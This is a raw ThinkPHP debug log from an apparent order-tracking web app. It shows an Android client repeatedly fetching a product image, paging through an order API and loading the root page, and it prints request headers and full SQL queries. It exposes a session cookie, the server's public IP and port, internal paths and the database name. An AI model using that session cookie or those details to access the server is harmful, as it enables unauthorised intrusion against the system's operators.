Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:55+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020428s][吞吐率:48.95req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001153s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:56+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [运行时间:0.054054s][吞吐率:18.50req/s] [内存消耗:4,769.92kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001145s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '2', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001598s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000479s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001523s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000477s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001377s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001383s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308376>orderinfo.end_time desc,1658308376>orderinfo.end_time desc,1658308376-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 20,10 [ RunTime:0.002409s ] --------------------------------------------------------------- [ 2022-07-20T17:12:56+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021431s][吞吐率:46.66req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001223s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:57+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020353s][吞吐率:49.13req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001174s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:57+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020531s][吞吐率:48.71req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001106s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:58+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021185s][吞吐率:47.20req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001212s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:01+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019304s][吞吐率:51.80req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001143s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021669s][吞吐率:46.15req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001310s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021574s][吞吐率:46.35req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000060s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001141s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:04+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019694s][吞吐率:50.78req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001103s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:06+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021719s][吞吐率:46.04req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001311s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:08+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [运行时间:0.055771s][吞吐率:17.93req/s] [内存消耗:4,769.88kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001223s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '3', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001691s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000554s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001471s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000409s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001923s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001129s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308388>orderinfo.end_time desc,1658308388>orderinfo.end_time desc,1658308388-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 30,10 [ RunTime:0.002538s ] --------------------------------------------------------------- [ 2022-07-20T17:13:09+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.029610s][吞吐率:33.77req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000059s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001764s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:09+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020471s][吞吐率:48.85req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001279s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:10+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030997s][吞吐率:32.26req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001347s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001737s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000094s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:10+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020804s][吞吐率:48.07req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001224s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:10+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.031507s][吞吐率:31.74req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001278s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001738s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:11+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030149s][吞吐率:33.17req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001095s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001838s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:11+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020949s][吞吐率:47.73req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001059s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:12+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.029510s][吞吐率:33.89req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001146s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001703s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 